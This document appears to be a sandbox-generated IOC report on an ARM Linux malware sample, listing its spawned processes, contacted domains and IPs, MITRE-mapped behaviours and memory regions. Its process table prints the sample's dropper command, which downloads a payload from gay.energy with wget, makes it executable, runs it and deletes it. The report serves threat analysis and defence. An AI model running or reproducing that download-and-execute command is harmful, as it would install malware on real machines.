Automated Malware Analysis IOC Report for

Processes

Path

Cmdline

Malicious

/tmp/armv5l.elf

/bin/sh

/bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."

/bin/sh

/usr/bin/wget

wget -q http://gay.energy/.../vivid -O .....

/bin/sh

/usr/bin/chmod

chmod 777 .....

/bin/sh

/bin/sh ./.....

/bin/sh

/usr/bin/rm

rm -rf .....

/tmp/armv5l.elf

/usr/bin/dash

/usr/bin/rm

rm -f /tmp/tmp.AuvqT3u8Nb /tmp/tmp.LwYSwGXz30 /tmp/tmp.PqowgKSo5U

/usr/bin/dash

/usr/bin/rm

rm -f /tmp/tmp.AuvqT3u8Nb /tmp/tmp.LwYSwGXz30 /tmp/tmp.PqowgKSo5U

There are 8 hidden processes, click here to show them.

Domains

Name

Malicious

gay.energy

unknown

Details

Name:	gay.energy
TargetID:	-1

Signature Hits	Behavior Group	Mitre Attack
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Executes the "wget" command typically used for HTTP/S downloading	Networking, Persistence and Installation Behavior	Application Layer Protocol
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)	Networking
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol

IPs

Domain

Country

Malicious

92.60.77.69

unknown

Italy

Details

IP:	92.60.77.69
TargetID:	-1
Country:	Italy
Countrycode:	ITA
ASN number:	5602
ASN name:	AS-IRIDEOS-KPIT
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Suricata IDS alerts for network traffic	Networking
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port
Connects to IPs without corresponding DNS lookups	Networking

34.249.145.219

unknown

United States

Details

IP:	34.249.145.219
TargetID:	-1
Country:	United States
Countrycode:	USA
ASN number:	16509
ASN name:	AMAZON-02US
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Connects to IPs without corresponding DNS lookups	Networking

109.202.202.202

unknown

Switzerland

Details

IP:	109.202.202.202
TargetID:	-1
Country:	Switzerland
Countrycode:	CHE
ASN number:	13030
ASN name:	INIT7CH
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Connects to IPs without corresponding DNS lookups	Networking

91.189.91.43

unknown

United Kingdom

Details

IP:	91.189.91.43
TargetID:	-1
Country:	United Kingdom
Countrycode:	GBR
ASN number:	41231
ASN name:	CANONICAL-ASGB
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Connects to IPs without corresponding DNS lookups	Networking

91.189.91.42

unknown

United Kingdom

Details

IP:	91.189.91.42
TargetID:	-1
Country:	United Kingdom
Countrycode:	GBR
ASN number:	41231
ASN name:	CANONICAL-ASGB
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Connects to IPs without corresponding DNS lookups	Networking

Memdumps

Base Address

Regiontype

Protect

Malicious

7f648c031000

page execute read

7f648c031000

page execute read

7f648c031000

page execute read

558c7493a000

page read and write

7f648c040000

page read and write

558c7493a000

page read and write

7f6592fa7000

page read and write

7f648c040000

page read and write

7f6592dc6000

page read and write

558c74931000

page read and write

558c746e0000

page execute read

7f658bfff000

page read and write

7ffc7323e000

page read and write

558c7694f000

page read and write

558c7694f000

page read and write

7f6592dc6000

page read and write

7f6593139000

page read and write

7f65927ea000

page read and write

7f6593139000

page read and write

558c746e0000

page execute read

7f6592a78000

page read and write

558c76938000

page execute and read and write

7f6592be4000

page read and write

7f6591bee000

page read and write

7f6592fa7000

page read and write

7f648c040000

page read and write

7f6592488000

page read and write

558c74931000

page read and write

7f65930d0000

page read and write

7f6592a78000

page read and write

7f648c039000

page read and write

7f658bfff000

page read and write

7f65930d0000

page read and write

558c7493a000

page read and write

7f6592fa7000

page read and write

7f658c021000

page read and write

7f658c021000

page read and write

7f6593139000

page read and write

558c746e0000

page execute read

558c74931000

page read and write

7ffc7323e000

page read and write

7f65930f4000

page read and write

558c7694f000

page read and write

7f65930f4000

page read and write

7f65923f6000

page read and write

7ffc7333b000

page execute read

7f65930d0000

page read and write

7f6591bee000

page read and write

7f6592488000

page read and write

7f65927ea000

page read and write

7f648c039000

page read and write

7f65923f6000

page read and write

7f65927ea000

page read and write

7f6592a78000

page read and write

7f6591bee000

page read and write

7f6592be4000

page read and write

7f658c021000

page read and write

7f658bfff000

page read and write

7ffc7333b000

page execute read

558c77eb9000

page read and write

7f6592a55000

page read and write

558c76938000

page execute and read and write

558c76938000

page execute and read and write

7f6592a55000

page read and write

558c77eb9000

page read and write

7f6592a55000

page read and write

558c77eb9000

page read and write

7f65930f4000

page read and write

7ffc7323e000

page read and write

7ffc7333b000

page execute read

7f6592be4000

page read and write

7f6592488000

page read and write

7f65923f6000

page read and write

7f648c039000

page read and write

7f6592dc6000

page read and write

There are 65 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
armv5l.elf

Processes

Domains

IPs

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportarmv5l.elf

Processes

Domains

IPs

Memdumps

IOC Report
armv5l.elf